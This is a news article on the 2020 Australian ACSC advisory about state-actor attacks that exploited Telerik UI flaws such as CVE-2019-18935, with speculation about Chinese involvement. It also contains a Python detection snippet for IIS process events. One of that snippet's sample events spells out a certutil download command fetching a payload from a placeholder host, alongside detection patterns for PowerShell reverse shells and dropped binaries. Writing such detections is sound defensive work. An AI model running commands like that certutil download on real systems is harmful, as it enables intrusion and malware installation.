
Massive Cyberattack on Australia Uses Cryptojacking Exploits





The Australian Cyber Security Centre (ACSC) said a group of “state actors” hacked Australian networks on June 19, and that one of the vulnerabilities they exploited is associated with cryptojacking malware attacks.
According to the 48-page report released on June 24, the threat actors exploited four critical vulnerabilities in Telerik UI, including CVE-2019-18935, which was recently leveraged by the Blue Mockingbird malware gang to infect thousands of systems with XMRig, Monero (XMR) mining software.

Vulnerability mostly used for cryptojacking purposes

Although the advisory didn’t say whether the hackers could have installed cryptojacking malware during the recent massive cyberattack, this vulnerability is the one cybercriminals prefer for installing crypto-mining applications within corporate networks.
The report elaborates on the CVE-2019-18935 vulnerability and describes activity similar to what Cointelegraph reported about the Blue Mockingbird attack, although this does not imply that the gang participated in the cyberattack against Australia:
“Other exploit payloads were identified by the ACSC most commonly when the actor’s attempt at a reverse shell was unsuccessful. These included: a payload that attempted to execute a PowerShell reverse shell; a payload that attempted to execute certutil.exe to download another payload; a payload that executed binary malware (identified in this advisory as HTTPCore) previously uploaded by the actor but which had no persistence mechanism; a payload that enumerated the absolute path of the web root and wrote that path to a file within the web root.”
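As an added detection example (not taken from the ACSC advisory or the original post), the following triages process-creation events for three of the payload behaviours quoted above: PowerShell launched by the web server, a certutil.exe download, and a previously uploaded binary being executed. It assumes the Telerik UI site runs under IIS (`w3wp.exe`) and that events carry Sysmon-style `ParentImage`, `Image` and `CommandLine` fields; the sample events, label names and path list are constructed for illustration.

```python
import ntpath
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields); not from the advisory.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://files.example.invalid/a.bin C:\Windows\Temp\a.bin"},
    {"ParentImage": r"c:\windows\system32\inetsrv\W3WP.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c <constructed placeholder>"},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\Temp\svc_update.exe",
     "CommandLine": r"C:\Windows\Temp\svc_update.exe"},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": "csc.exe /noconfig @options.cmdline"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -hashfile report.pdf SHA256"},
]

WEB_WORKERS = {"w3wp.exe"}  # assumption: the site is hosted by IIS
EXPECTED_CHILDREN = {"csc.exe", "vbc.exe", "cvtres.exe"}  # ASP.NET dynamic compilation; tune per host
DOWNLOAD_RE = re.compile(r"[-/](urlcache|verifyctl)\b.*https?://", re.I)
WRITABLE = (r"c:\windows\temp", r"c:\inetpub", r"c:\users")  # illustrative list, adjust per host

def base(path):
    return ntpath.basename(path.strip('"')).lower()

def classify(event):
    """Return a finding label for a child of the web worker process, else None."""
    if base(event["ParentImage"]) not in WEB_WORKERS:
        return None
    child = base(event["Image"])
    if child == "certutil.exe":
        return "certutil-download" if DOWNLOAD_RE.search(event.get("CommandLine", "")) else "certutil-other"
    if child in {"powershell.exe", "pwsh.exe"}:
        return "powershell-from-web-worker"
    if event["Image"].strip('"').lower().startswith(WRITABLE):
        return "binary-from-writable-path"
    if child in EXPECTED_CHILDREN:
        return None
    return "unexpected-child"

def triage(events):
    return [(label, e["Image"]) for e in events if (label := classify(e))]
```

The fourth behaviour in the quote, writing the web root path to a file inside the web root, is better covered by file-creation monitoring on the web root than by process events.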

Were state-backed Chinese hacker groups behind the attack?

Almost 10 Chinese hacker groups that engage in espionage activities and allegedly have connections with China’s government have the PlugX malware among their weapons, and PlugX was one of the malware families identified in the Australian government’s report.
Some Australian officials have suggested that China could be behind the massive cyberattack, as diplomatic tensions between the two countries have been on the rise. It was said the attack could have come after Australia sought an investigation into the origin of the COVID-19 virus, something that was not well received by the dragon nation’s officials, who considered it a “discriminatory” accusation and responded with trade retaliation against the Oceanic country.
The Chinese government has denied the claims.